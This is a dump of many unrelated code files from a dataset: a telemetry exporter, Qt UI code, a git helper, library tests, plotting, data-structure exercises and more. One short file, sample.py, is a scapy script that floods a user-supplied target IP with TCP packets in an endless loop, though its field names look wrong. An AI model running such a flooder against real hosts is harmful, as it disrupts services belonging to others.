self._handle_transmit_from_storage(envelopes, result)\n return _get_metric_export_result(result)\n except Exception: # pylint: disable=broad-except\n _logger.exception(\"Exception occurred while exporting the data.\")\n return _get_metric_export_result(ExportResult.FAILED_NOT_RETRYABLE)\n\n def force_flush(\n self,\n timeout_millis: float = 10_000,\n ) -> bool:\n \"\"\"\n Ensure that export of any metrics currently received by the exporter\n are completed as soon as possible.\n \"\"\"\n return True\n\n def shutdown(\n self,\n timeout_millis: float = 30_000, # pylint: disable=unused-argument\n **kwargs: Any, # pylint: disable=unused-argument\n ) -> None:\n \"\"\"Shuts down the exporter.\n\n Called when the SDK is shut down.\n \"\"\"\n self.storage.close()\n\n def _point_to_envelope(\n self,\n point: DataPointT,\n name: str,\n resource: Optional[Resource] = None,\n scope: Optional[InstrumentationScope] = None\n ) -> TelemetryItem:\n envelope = _convert_point_to_envelope(point, name, resource, scope)\n envelope.instrumentation_key = self._instrumentation_key\n return envelope\n\n @classmethod\n def from_connection_string(\n cls, conn_str: str, **kwargs: Any\n ) -> \"AzureMonitorMetricExporter\":\n \"\"\"\n Create an AzureMonitorMetricExporter from a connection string.\n\n This is the recommended way of instantation if a connection string is passed in explicitly.\n If a user wants to use a connection string provided by environment variable, the constructor\n of the exporter can be called directly.\n\n :param str conn_str: The connection string to be used for authentication.\n :keyword str api_version: The service API version used. Defaults to latest.\n :returns an instance of ~AzureMonitorMetricExporter\n \"\"\"\n return cls(connection_string=conn_str, **kwargs)\n\n\n# pylint: disable=protected-access\ndef _convert_point_to_envelope(\n point: DataPointT,\n name: str,\n resource: Optional[Resource] = None,\n scope: Optional[InstrumentationScope] = None\n) -> TelemetryItem:\n envelope = _utils._create_telemetry_item(point.time_unix_nano)\n envelope.name = \"Microsoft.ApplicationInsights.Metric\"\n envelope.tags.update(_utils._populate_part_a_fields(resource))\n namespace = None\n if scope is not None:\n namespace = scope.name\n value = 0\n count = 1\n min_ = None\n max_ = None\n # std_dev = None\n\n if isinstance(point, NumberDataPoint):\n value = point.value\n elif isinstance(point, HistogramDataPoint):\n value = point.sum\n count = int(point.count)\n min_ = point.min\n max_ = point.max\n\n data_point = MetricDataPoint(\n name=str(name)[:1024],\n namespace=str(namespace)[:256],\n value=value,\n count=count,\n min=min_,\n max=max_,\n )\n properties = _utils._filter_custom_properties(point.attributes)\n data = MetricsData(\n properties=properties,\n metrics=[data_point],\n )\n\n envelope.data = MonitorBase(base_data=data, base_type=\"MetricData\")\n\n return envelope\n\n\ndef _get_metric_export_result(result: ExportResult) -> MetricExportResult:\n if result == ExportResult.SUCCESS:\n return MetricExportResult.SUCCESS\n if result in (\n ExportResult.FAILED_RETRYABLE,\n ExportResult.FAILED_NOT_RETRYABLE,\n ):\n return MetricExportResult.FAILURE\n return None\n","sub_path":"sdk/monitor/azure-monitor-opentelemetry-exporter/azure/monitor/opentelemetry/exporter/export/metrics/_exporter.py","file_name":"_exporter.py","file_ext":"py","file_size_in_byte":6177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"336070860","text":"##This Script is for ITIM NA ARKO only\r\n########BOROD#######\r\n########BANING######\r\n########BAJOHN######\r\n\r\n\r\n\r\nfrom scapy.all import *\r\n\r\n##This Script is for ITIM NA ARKO only\r\n########BOROD#######\r\n########BANING######\r\n########BAJOHN######\r\n\r\nsource_IP = input(\"Enter IP address of Source: \")\r\ntarget_IP = input(\"Enter IP address of Target: \")\r\nsource_port = int(input(\"Enter Source Port Number:\"))\r\ni = 1\r\n\r\nwhile True:\r\n IP1 = IP(source_IP=source_IP, destination=target_IP)\r\n TCP1 = TCP(srcport=source_port, dstport=80)\r\n pkt = IP1 / TCP1\r\n send(pkt, inter=.001)\r\n\r\n print(\"packet sent \", i)\r\n i = i + 1\r\n","sub_path":"sample.py","file_name":"sample.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"127851203","text":"import sys, time, json, os.path, os, subprocess, queue, threading, traceback\nos.environ[\"QT_IM_MODULE\"] = \"qtvirtualkeyboard\"\nfrom signal import signal, SIGINT, SIGTERM\nfrom time import sleep\nfrom sys import exit\nfrom collections import OrderedDict\n# import random\nfrom PySide2.QtGui import QGuiApplication\nfrom PySide2.QtCore import QObject, QUrl, Slot, QStringListModel, Property, Signal, QTimer, QThreadPool, QRunnable\nfrom PySide2.QtQml import QQmlApplicationEngine, qmlRegisterType\nfrom PySide2.QtGui import QIcon\n# # compiled QML files, compile with pyside2-rcc\n# import qml.qml\n\nos.environ[\"QT_IM_MODULE\"] = \"qtvirtualkeyboard\"\nimport icons.icons\n# #, imagine_assets\nimport resource_rc\n\nEXIT_PROCESS = [False]\n# import patch_bay_model\n\n\ncurrent_source_port = None\n# current_effects = OrderedDict()\ncurrent_effects = {}\n# current_effects[\"delay1\"] = {\"x\": 20, \"y\": 30, \"effect_type\": \"delay\", \"controls\": {}, \"highlight\": False}\n# current_effects[\"delay2\"] = {\"x\": 250, \"y\": 290, \"effect_type\": \"delay\", \"controls\": {}, \"highlight\": False}\nport_connections = {} # key is port, value is list of ports\n\ncontext = None\n\n\nif __name__ == \"__main__\":\n\n print(\"in Main\")\n app = QGuiApplication(sys.argv)\n QIcon.setThemeName(\"digit\")\n # Instantiate the Python object.\n # knobs = Knobs()\n\n # update_counter = PolyValue(\"update counter\", 0, 0, 500000)\n # read persistant state\n # pedal_state = {}\n # with open(\"/pedal_state/state.json\") as f:\n # pedal_state = json.load(f)\n # current_bpm = PolyValue(\"BPM\", 120, 30, 250) # bit of a hack\n # current_preset = PolyValue(\"Default Preset\", 0, 0, 127)\n # update_counter = PolyValue(\"update counter\", 0, 0, 500000)\n # command_status = [PolyValue(\"command status\", -1, -10, 100000), PolyValue(\"command status\", -1, -10, 100000)]\n # delay_num_bars = PolyValue(\"Num bars\", 1, 1, 16)\n # midi_channel = PolyValue(\"channel\", pedal_state[\"midi_channel\"], 1, 16)\n # input_level = PolyValue(\"input level\", pedal_state[\"input_level\"], -80, 10)\n # knobs.set_input_level(pedal_state[\"input_level\"], write=False)\n\n # available_effects = QStringListModel()\n # available_effects.setStringList(list(effect_type_map.keys()))\n engine = QQmlApplicationEngine()\n\n # qmlRegisterType(patch_bay_model.PatchBayModel, 'Poly', 1, 0, 'PatchBayModel')\n # Expose the object to QML.\n # global context\n context = engine.rootContext()\n # context.setContextProperty(\"knobs\", knobs)\n # context.setContextProperty(\"available_effects\", available_effects)\n # context.setContextProperty(\"selectedEffectPorts\", selected_effect_ports)\n # context.setContextProperty(\"portConnections\", port_connections)\n # context.setContextProperty(\"effectPrototypes\", effect_prototypes)\n # context.setContextProperty(\"updateCounter\", update_counter)\n # context.setContextProperty(\"currentBPM\", current_bpm)\n # # context.setContextProperty(\"pluginState\", plugin_state)\n # context.setContextProperty(\"currentPreset\", current_preset)\n # context.setContextProperty(\"commandStatus\", command_status)\n # context.setContextProperty(\"delayNumBars\", delay_num_bars)\n # context.setContextProperty(\"midiChannel\", midi_channel)\n # context.setContextProperty(\"isLoading\", is_loading)\n # # context.setContextProperty(\"inputLevel\", input_level)\n # context.setContextProperty(\"presetList\", preset_list_model)\n # print(\"starting recv thread\")\n engine.load(QUrl(\"qml/TestWrapper.qml\"))\n # ingen_wrapper.start_recv_thread(ui_messages)\n # print(\"starting send thread\")\n # ingen_wrapper.start_send_thread()\n # try:\n # add_io()\n # except Exception as e:\n # print(\"########## e is:\", e)\n # ex_type, ex_value, tb = sys.exc_info()\n # error = ex_type, ex_value, ''.join(traceback.format_tb(tb))\n # print(\"EXception is:\", error)\n # sys.exit()\n\n # sys._excepthook = sys.excepthook\n # def exception_hook(exctype, value, traceback):\n # print(\"except hook got a thing!\")\n # sys._excepthook(exctype, value, traceback)\n # sys.exit(1)\n # sys.excepthook = exception_hook\n # try:\n # crash_here\n # except:\n # print(\"caught crash\")\n # timer = QTimer()\n # timer.timeout.connect(tick)\n # timer.start(1000)\n\n def signalHandler(sig, frame):\n if sig in (SIGINT, SIGTERM):\n # print(\"frontend got signal\")\n # global EXIT_PROCESS\n EXIT_PROCESS[0] = True\n # ingen_wrapper._FINISH = True\n signal(SIGINT, signalHandler)\n signal(SIGTERM, signalHandler)\n # initial_preset = False\n print(\"starting UI\")\n while not EXIT_PROCESS[0]:\n # debug_print(\"processing events\")\n try:\n app.processEvents()\n # debug_print(\"processing ui messages\")\n except Exception as e:\n qCritical(\"########## e is:\"+ str(e))\n ex_type, ex_value, tb = sys.exc_info()\n error = ex_type, ex_value, ''.join(traceback.format_tb(tb))\n # debug_print(\"EXception is:\", error)\n sys.exit()\n sleep(0.01)\n\n qWarning(\"mainloop exited\")\n app.exit()\n sys.exit()\n qWarning(\"sys exit called\")\n","sub_path":"show_single_widget.py","file_name":"show_single_widget.py","file_ext":"py","file_size_in_byte":5205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"32803799","text":"import subprocess\nfrom\ttermcolor import colored\n\nproc = subprocess.Popen(['git', 'status', \"--porcelain\"], stdout=subprocess.PIPE)\noutput = proc.stdout.read()\noutput = str(output, 'utf-8').split('\\n')\n\nsubprocess.call([\"rm\", \"-f\", \"./.git/index.lock\"])\n\nfiles_to_push = []\nfor single_out in output:\n\ttemp = single_out.split(' ')\n\tif '??' in temp[0]:\n\t\tfiles_to_push.append(temp[1])\n\nfor file in files_to_push:\n\tcmd = \"git add \" + file\n\ttry:\n\t\tsubprocess.Popen([\"git\", \"add\", file], stdout=subprocess.PIPE)\n\t\toutput = proc.stdout.read()\n\texcept:\n\t\tprint(colored(\"The File\", \"white\"), end=\" \")\n\t\tprint(colored(f\"[{file}]\", \"yellow\"), end=\" \")\n\t\tprint(colored(\"Added\", \"white\"), end=\" \")\n\t\tprint(colored(\"=> Failed\", \"red\"))\n\ttry:\n\t\tcmd = 'add solution of ' + file.replace('_', ' ').split('.')[0] + ' problem'\n\t\tsubprocess.Popen([\"git\", \"commit\", \"-m\", cmd], stdout=subprocess.PIPE)\n\t\toutput = proc.stdout.read()\n\texcept:\n\t\tprint(colored(\"The File\", \"white\"), end=\" \")\n\t\tprint(colored(f\"[{file}]\", \"yellow\"), end=\" \")\n\t\tprint(colored(\"Commited\", \"white\"), end=\" \")\n\t\tprint(colored(\"=> Failed\", \"red\"))\n\n\tprint(colored(\"The File\", \"white\"), end=\" \")\n\tprint(colored(f\"[{file}]\", \"yellow\"), end=\" \")\n\tprint(colored(\"Added and Commited\", \"white\"), end=\" \")\n\tprint(colored(\"=> SUCCESS\", \"green\"))\n\n","sub_path":"push.py","file_name":"push.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"215669654","text":"# Writing the mean.py file\ndef mean(num_list):\n #assert type(num_list) == list\n #if len(num_list) == 0:\n # raise Exception(\"the list has length of 0\")\n #assert len(num_list) != 0 \n try:\n return sum(num_list)/len(num_list)\n except ZeroDivisionError:\n return 0\n except TypeError as detail:\n msg = \"must have list of numbers\"\n raise TypeError(detail.__str__() + \"\\n\" + msg)\n","sub_path":"mean.py","file_name":"mean.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"593917097","text":"from listas import LinkedList\r\n\r\nl = LinkedList()\r\nprint(f\"L esta vacía? {l.is_empty()}\")\r\nl.append(10)\r\nl.append(5)\r\nl.append(6)\r\nl.append(20)\r\nl.append(22)\r\n\r\nprint(f\"L está vacía? {l.is_empty()}\")\r\n\r\nl.transversal()\r\nl.remove(10)\r\nl.transversal()\r\nl.preppend(3)\r\nl.transversal()\r\nprint(l.get())\r\nprint(l.get(2))\r\nprint(l.get(0))\r\n","sub_path":"pruebas_listas.py","file_name":"pruebas_listas.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"180019907","text":"from itertools import product\n\nimport pytest\n\nfrom lakota import Repo, Schema\nfrom lakota.pod import MemPOD\nfrom lakota.utils import chunky\n\nLABELS = \"zero one two three four five six seven eight nine\".split()\nSCHEMA = Schema(timestamp=\"int *\", value=\"float\")\n\n\n@pytest.fixture\ndef repo():\n return Repo(pod=MemPOD(\".\"))\n\n\n@pytest.mark.parametrize(\"squash\", [True, False])\ndef test_create_collections(repo, squash):\n \"\"\"\n Create all labels in one go\n \"\"\"\n\n base_labels = [\"b\", \"c\", \"e\"]\n repo.create_collection(SCHEMA, *base_labels)\n\n # Test that we can get back those series\n for label in base_labels:\n collection = repo / label\n assert collection.label == label\n\n # Test double creation\n repo.create_collection(SCHEMA, *base_labels)\n assert sorted(repo.ls()) == sorted(base_labels)\n\n # Add 'a' (first), 'f' (last) and 'd' (middle)\n repo.create_collection(SCHEMA, \"a\")\n expected = list(\"abce\")\n assert repo.ls() == expected\n\n repo.create_collection(SCHEMA, \"f\")\n expected = list(\"abcef\")\n assert repo.ls() == expected\n\n if squash:\n repo.registry.squash()\n\n repo.create_collection(SCHEMA, \"d\")\n expected = list(\"abcdef\")\n assert repo.ls() == expected\n\n\n@pytest.mark.parametrize(\"merge\", [True, False])\ndef test_create_labels_chunks(repo, merge):\n \"\"\"\n Create all labels in chunks\n \"\"\"\n for label_chunk in chunky(LABELS, 3):\n repo.create_collection(SCHEMA, *label_chunk)\n\n # Test that we can get back those series\n for label in LABELS:\n coll = repo / label\n assert coll.label == label\n\n # Same after merge\n if merge:\n repo.merge()\n for label in LABELS:\n coll = repo / label\n assert coll.label == label\n\n\n@pytest.mark.parametrize(\n \"squash,once,to_delete\",\n product(\n [True, False],\n [True, False],\n [[\"eight\"], [\"zero\"], [\"eight\", \"zero\"], [\"seven\"], [\"foobar\"]],\n ),\n)\ndef test_delete(repo, squash, once, to_delete):\n if once:\n repo.create_collection(SCHEMA, *LABELS)\n else:\n for label in LABELS:\n repo.create_collection(SCHEMA, label)\n expected = sorted(LABELS)\n assert repo.ls() == expected\n\n # Remove one or more label and check result\n repo.delete(*to_delete)\n if squash:\n repo.registry.squash()\n expected = [l for l in expected if l not in to_delete]\n assert repo.ls() == expected\n for label in to_delete:\n assert repo / label is None\n\n\n@pytest.mark.parametrize(\"merge\", [True, False])\ndef test_delete_and_recreate(repo, merge):\n clct = repo.create_collection(SCHEMA, \"test_coll\")\n series = clct / \"test_series\"\n series.write(\n {\n \"timestamp\": [1, 2, 3],\n \"value\": [1, 2, 3],\n }\n )\n\n # Delete & re-create\n repo.delete(\"test_coll\")\n if merge:\n repo.merge()\n clct = repo.create_collection(SCHEMA, \"test_coll\")\n assert list(clct) == []\n\n\ndef test_label_regexp():\n repo = Repo()\n ok = [\"abc\", \"abc-abc-123\", \"abc_abc-123.45\", \"abc+abc\", \"$\", \"é\"]\n for label in ok:\n repo.create_collection(SCHEMA, label)\n repo.create_collection(SCHEMA, label.upper())\n\n not_ok = [\"\", \"\\t\", \"\\n\"]\n for label in not_ok:\n with pytest.raises(ValueError):\n repo.create_collection(SCHEMA, label)\n with pytest.raises(ValueError):\n repo.create_collection(SCHEMA, label + \" \")\n\n\n@pytest.mark.parametrize(\"large\", [True, False])\ndef test_gc(repo, large):\n # Because we auto-embed small arrays in commit, we have to test\n # both small and big arrays.\n\n coll = repo.create_collection(SCHEMA, \"a_collection\")\n size = 100_000 if large else 10\n\n for offset, label in enumerate((\"label_a\", \"label_b\")):\n series = coll / label\n for i in range(offset, offset + 10):\n series.write(\n {\n \"timestamp\": range(i, i + size),\n \"value\": range(i + 100, i + 100 + size),\n }\n )\n\n # Merge label_a\n coll = repo / \"a_collection\"\n coll.merge()\n\n # Launch garbage collection\n count = repo.gc()\n assert count == 0\n\n # Read back data\n coll = repo / \"a_collection\"\n assert coll.ls() == [\"label_a\", \"label_b\"]\n\n\ndef test_refresh():\n pod = MemPOD(\".\")\n repo = Repo(pod=pod)\n\n repo.create_collection(SCHEMA, \"collection\")\n assert repo.ls() == [\"collection\"]\n repo2 = Repo(pod=pod)\n repo2.delete(\"collection\")\n # repo is out of sync\n assert repo.ls() == [\"collection\"]\n # refresh slove ths\n repo.refresh()\n assert repo.ls() == []\n\n\ndef test_rename(repo):\n frm = {\n \"timestamp\": [1, 2, 3],\n \"value\": [1, 2, 3],\n }\n # Rename collection\n repo.create_collection(SCHEMA, \"A\", \"B\", \"C\")\n srs = repo / \"A\" / \"a\"\n srs.write(frm)\n repo.rename(\"A\", \"D\")\n\n # Make sure series are still there\n srs = repo / \"D\" / \"a\"\n assert srs.frame() == frm\n\n # Rename to an existing label is not supported\n assert repo.ls() == [\"B\", \"C\", \"D\"]\n with pytest.raises(ValueError):\n repo.rename(\"B\", \"C\")\n","sub_path":"tests/repo_test.py","file_name":"repo_test.py","file_ext":"py","file_size_in_byte":5145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"507975956","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import LogNorm\nimport time\nimport sys\n\ndef get_map(frame, lowlim=0, uplim=1000,frac=1):\n t0=time.time()\n windowlength=270\n leftside=50\n heatMap=np.zeros((windowlength,uplim))\n nFrames=int(len(frame)*frac)\n for n in range(0, nFrames):\n crossing=frame.refpoint[n]\n if n%10 == 0 and n>0:\n t = time.time()\n ETA = ((t-t0)/(n))*(nFrames-n)\n ETAh = ETA/3600\n ETAm = (ETAh%1)*60\n ETAs = (ETAm%1)*60\n k = 100*n/nFrames\n sys.stdout.write(\"\\rGenerating heatmap %d%%, ETA: %dh %dm %ds\" % (k, ETAh, ETAm, ETAs))\n sys.stdout.flush()\n for i in range(0,windowlength):\n if i+crossing-leftside<1029:\n if max(frame.samples[n])uplim):\n continue\n else:\n heatMap[i][int(frame.samples[n][i+crossing-leftside])] += 1\n\n\n heatMap=np.rot90(heatMap, k=-1, axes=(0,1))\n heatMap=np.fliplr(heatMap)\n #We want all the zero valued bins to be depicted as black. It is easier to look at.\n #heat map with Zeroes boosted to 0.01\n heatmapZboost=heatMap[:][:]\n for u in range(0,uplim):\n #print('u = ', u)\n for y in range(0,windowlength):\n #print('y = ', y)\n if heatmapZboost[u][y] < 1:\n heatmapZboost[u][y] = 0.01\n\n plt.imshow(heatmapZboost[1:uplim],cmap='gnuplot',aspect='auto', norm=LogNorm(vmin=0.01, vmax=15000), interpolation='nearest',origin = 'lower')\n #for i in range(50, 70):\n # plt.plot(frame.samples[i][frame.refpoint[i]-leftside:frame.refpoint[i]+windowlength-leftside])\n \n plt.xlabel('Time ns')\n plt.ylabel('ADC value')\n clb = plt.colorbar()\n clb.ax.set_title('Counts')\n plt.axvline(50)\n plt.show()\n tf = time.time()\n print('\\n runtime = ', tf-t0)\n return heatMap, heatmapZboost\n","sub_path":"heatmapper.py","file_name":"heatmapper.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"385904259","text":"import sys\n\n'''\nThis module is print function package to decoration for string\n'''\n\nclass ZeroIndexError(Exception):\n def __init__(self, msg):\n self.msg = msg\n def __str__(self):\n return self.msg\n\nclass OverIndexError(Exception):\n def __init__(self, msg):\n self.msg = msg\n def __str__(self):\n return self.msg\n\nclass CheckIndex:\n def __init__(self, index, l_list):\n self.index = index\n self.l_list = l_list\n def check(self):\n if self.index <=0:\n raise ZeroIndexError(\"ZeroIndexError: should input over zero. Plese check index\")\n if self.index > len(self.l_list):\n raise OverIndexError(\"OverIndexError: list index out of range\")\n\ndef print_with_ab(string):\n \"\"\"\n This is a function to print asterisk border line around the string\n \"\"\"\n print('*'* (len(string) + 4))\n print('* ' + string + ' *')\n print('*'* (len(string) + 4))\n\ndef print_with_dlb(string):\n \"\"\"\n This is a function to print double line border line around the string\n \"\"\"\n print('='* (len(string) + 4))\n print('= ' + string + ' =')\n print('='* (len(string) + 4))\n\ndef print_list_value(s, index=None):\n \"\"\"\n This is a fucntion to find string value and index number in the string\n \"\"\"\n str_list = s.split()\n if index != None:\n try:\n CheckIndex(index, str_list).check()\n if index == 1:\n print(f'The {index}st value is \" {str_list[index-1]} \"')\n elif index == 2:\n print(f'The {index}nd value is \" {str_list[index-1]} \"')\n else:\n print(f'The {index}th value is \" {str_list[index-1]} \"')\n except ZeroIndexError as e:\n print(e); exit()\n except OverIndexError as e:\n print(e); exit()\n \n else:\n index = 0\n for val in str_list:\n if index == 0:\n print(f'[ {val} ] is the {index+1}st value in string')\n elif index == 1:\n print(f'[ {val} ] is the {index+1}nd value in string')\n else:\n print(f'[ {val} ] is the {index+1}th value in string')\n index = index + 1\n\nif __name__ == '__main__':\n l = len(sys.argv)-1\n s = sys.argv[1]\n functions = {'-a': print_with_ab, '-d': print_with_dlb,'-s': print_list_value}\n if l == 1:\n print(s) \n elif l == 2:\n opt = sys.argv[2]\n if opt == '-a' or opt =='-d' or opt =='-s':\n opt = sys.argv[2]\n func = functions[opt]\n func(s)\n else:\n func = functions['-a']\n func(s)\n else:\n func = functions['-s']\n func(s, int(sys.argv[3]))","sub_path":"string_print.py","file_name":"string_print.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"537925150","text":"\"\"\"\nThis standalone module looks for all the unique MDRs in the /var/opt/gmc/gliders directory and saves them with a unique, timastamp name in a local directory\nThis module intended to be run on server (no sftp capabilities) with manual involvement\n\n#1 walk the /var/opt/gmc/gliders directory and collect all the fullpaths of files ending in .mdr\n#2 orgnize them by node number and then order by time\n#3 open content of each file from part1, compare with local content, if all different, save it\n\n\"\"\"\nimport os\nimport time\n\nmdr_archive = {}\nmdr_from_gmc = {}\n#rootpath = '/var/opt/gmc/gliders'\n#rootpath = '/home/gmc/gliders'\nsrc = 'mdr_pileup'\ndest = 'mdr_archive'\n\n# get all foreign mdr's\nfor fname in os.listdir(src):\n fullpath = os.path.join(src,fname)\n if len(fname)==6:\n fname = time.strftime('%Y%m%dT%H%M%S_',time.gmtime())+fname\n else:\n node = fname[-6:-4] #node number always the 2 characters before '.mdr' extn\n try: mdr_from_gmc[node]\n except: \n mdr_from_gmc[node] = []\n mdr_archive[node] = []\n with open(fullpath) as f:\n mdr_from_gmc[node].append( (fname, f.read()) )\n\n#compare foreign mdrs with archived ones\nfor node in mdr_from_gmc:\n mdr_from_gmc[node].sort(key=lambda tup: tup[0])\n for mdr_tup in mdr_from_gmc[node]:\n # if content of this mdr file not in the archive, add the mdr to the archive\n if mdr_tup[1] not in [mdr_arch_tup[1] for mdr_arch_tup in mdr_archive[node]]:\n mdr_archive[node].append(mdr_tup)\n\n#write mdr's to archive\nfor node in mdr_archive:\n for mdr_tup in mdr_archive[node]:\n fullpath = os.path.join(dest,mdr_tup[0]) \n with open(fullpath,'w') as f:\n f.write(mdr_tup[1])","sub_path":"gliderops/report/aggregate_mdr.py","file_name":"aggregate_mdr.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"201058712","text":"'''\nTime Complexity: O(n)\nSpace Complexity:O(n)\nDid this code successfully run on Leetcode : Yes\nExplanation: Create a stack of indexes - the stack contains all indexes of the next greater element value whose max\nwe don't know, if the temperature value of the ith element is greater than the top of the stack value then this is the\nnew maximum, so pop all the values which are in the stack which have a value less than\nthe current value and update their max in the result array. For the nth element we do another pass around the array\nto find its next largest element.\n'''\n\nclass Solution:\n def nextGreaterElements(self, nums: List[int]) -> List[int]:\n if nums == None or len(nums) == 0:\n return []\n\n res = [-1 for i in range(len(nums))]\n stack = []\n n = len(nums)\n for index in range(0, 2 * n):\n while len(stack) != 0 and nums[index % n] > nums[stack[-1]]:\n priorIndex = stack.pop()\n res[priorIndex] = nums[index % n]\n\n # as you need to do this only for 1 pass\n if index < n:\n stack.append(index % n)\n\n return res\n\n","sub_path":"nextGreaterElement.py","file_name":"nextGreaterElement.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"179209974","text":"def has_cblas(self, info):\n res = False\n c = distutils.ccompiler.new_compiler()\n tmpdir = tempfile.mkdtemp()\n s = '#include \\n int main(int argc, const char *argv[])\\n {\\n double a[4] = {1,2,3,4};\\n double b[4] = {5,6,7,8};\\n return cblas_ddot(4, a, 1, b, 1) > 10;\\n }'\n src = os.path.join(tmpdir, 'source.c')\n try:\n with open(src, 'wt') as f:\n f.write(s)\n try:\n obj = c.compile([src], output_dir=tmpdir, include_dirs=self.get_include_dirs())\n try:\n c.link_executable(obj, os.path.join(tmpdir, 'a.out'), libraries=['cblas'], library_dirs=info['library_dirs'], extra_postargs=info.get('extra_link_args', []))\n res = 'cblas'\n except distutils.ccompiler.LinkError:\n c.link_executable(obj, os.path.join(tmpdir, 'a.out'), libraries=['blas'], library_dirs=info['library_dirs'], extra_postargs=info.get('extra_link_args', []))\n res = 'blas'\n except distutils.ccompiler.CompileError:\n res = None\n finally:\n shutil.rmtree(tmpdir)\n return res","sub_path":"Data Set/bug-fixing-5/730af6f800d7e9b57ae7a2233aa7ca563603c960--bug.py","file_name":"730af6f800d7e9b57ae7a2233aa7ca563603c960--bug.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"408606982","text":"import elasticsearch as es\nimport json\n\nclient = es.Elasticsearch(\"220.69.209.17:9200\")\ndoc = client.get(index = 'test', doc_type = '0001', id='board')\n\nerror = True\noverlap = False\n\n#에러체크\n\n#우선, 아이템에 중복된 내용이 있는가 체크. 폴더 검사\n\n\n#items 생성시켜줄 정보\nif error:\n j = doc[\"_source\"]\n\n snode = \"String snode \\\"위치[\" + j[\"snode\"] + \"]\\\"\\n\"\n uid = \"String uid \\\"Uid[\" + j[\"uid\"] + \"]\\\"\\n\"\n name = \"String name \\\"센서명[\" + j[\"name\"] + \"]\\\"\\n\"\n date = \"String date \\\"등록날짜[\" + j[\"date\"] + \"]\\\"\\n\" \n user_id = \"String user_id \\\"사용자 ID[\" + j[\"user_id\"] + \"]\\\"\\n\"\n gps_lat = \"String gps_lat \\\"위도[\" + str(j[\"gps:lat\"]) + \"]\\\"\\n\"\n gps_lon = \"String gps_lon \\\"경도[\" + str(j[\"gps:lon\"]) + \"]\\\"\" \n state = \"String state \\\"단말 정보\\\"\"\n\n send = state + snode + uid + name + date + user_id + gps_lat + gps_lon\n\n #sitemap 추가시켜줄 정보\n snode_s = \"Text item=snode\"\n uid_s = \"Text item=uid\"\n name = \"Text item=name\"\n date = \"Text item=date\"\n user_id_s = \"Text item=user_id\"\n gps_lat_s = \"Text item=gps_lat\"\n gps_lon_s = \"Text item=gps_lon\"\n state_s =\"Text item=state\"\n\n send_s = \"\\tFrame label=\\\"단말정보\\\"\\n\\t\\t\" + state_s + \"{\\n\\t\\t\\t\" + uid_s + \"\\n\\t\\t\\t\" + name + \"\\n\\t\\t\\t\" + date + \"\\n\\t\\t\\t\" + user_id_s + \"\\n\\t\\t\\t\" + gps_lat_s + \"\\n\\t\\t\\t\" + gps_lon_s + \"\\n\\t\\t}\\n\\t}\"\n\n #with open(\"/etc/openhab2/items/\" + j[\"uid\"], \"w\") as items:\n # items.write(send)\n \n\n print(send)\n print(send_s)\n","sub_path":"교내,대외활동/임산업용 IoT 네트워크 모듈 개발/2018_10_08/이전 코드/이전 이전 코드/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"46705834","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nimport csv\n#from tensorflow.examples.tutorials.mnist import input_data\n\n#mnist = input_data.read_data_sets(\"input/data\", one_hot=True)\n\ndef donnees():\n #with open('gout.csv', 'rt') as csvfile:\n #spamreader = csv.reader(csvfile, delimiter=';', quotechar='|')\n\n #for row in spamreader:\n #print(', '.join(row))\n #return \"a\"\n result = np.loadtxt(open(\"carte2.csv\", \"rb\"), delimiter=\",\", skiprows=1)\n #x = list(reader)\n #result = np.array(x).astype(\"float\")\n return result\n\ntriplets = []\nmatrice = donnees()\nfor i in range(0, 40):\n\tj = 0\n\tfor el in matrice[i]:\n\t\tprint(int(matrice[i][j]), int(matrice[i+39][j]), int(matrice[i+79][j]))\n\t\tj = j + 1\n\t","sub_path":"Entrainement/cartes/carte_association_regle.py","file_name":"carte_association_regle.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"565366263","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n\n# boundary traversal of a given binary tree\n\n# left boundary + all the leaf nodes + right boundary\ndef printBoundary(root):\n result = []\n if (root):\n result.append(root.data)\n printBoundaryLeft(root.left, result)\n print(root.data)\n # print leaves starting from the root node\n printLeaves(root, result)\n #printLeaves(root.right, result)\n print(root.data)\n printBoundaryRight(root.right, result)\n return result\n\n\ndef printBoundaryLeft(root, result):\n\n if(root):\n if (root.left):\n result.append(root.data)\n #print(result)\n printBoundaryLeft(root.left, result)\n elif(root.right):\n result.append(root.data)\n printBoundaryLeft(root.right, result)\n\n\ndef printLeaves(root, result):\n\tif not root:\n\t\treturn\n\tif not root.left and not root.right:\n\t\tresult.append(root.data)\n\t#print(result)\n\tprintLeaves(root.left, result)\n\tprintLeaves(root.right, result)\n\n\ndef printBoundaryRight(root, result):\n if(root):\n if (root.right):\n printBoundaryRight(root.right, 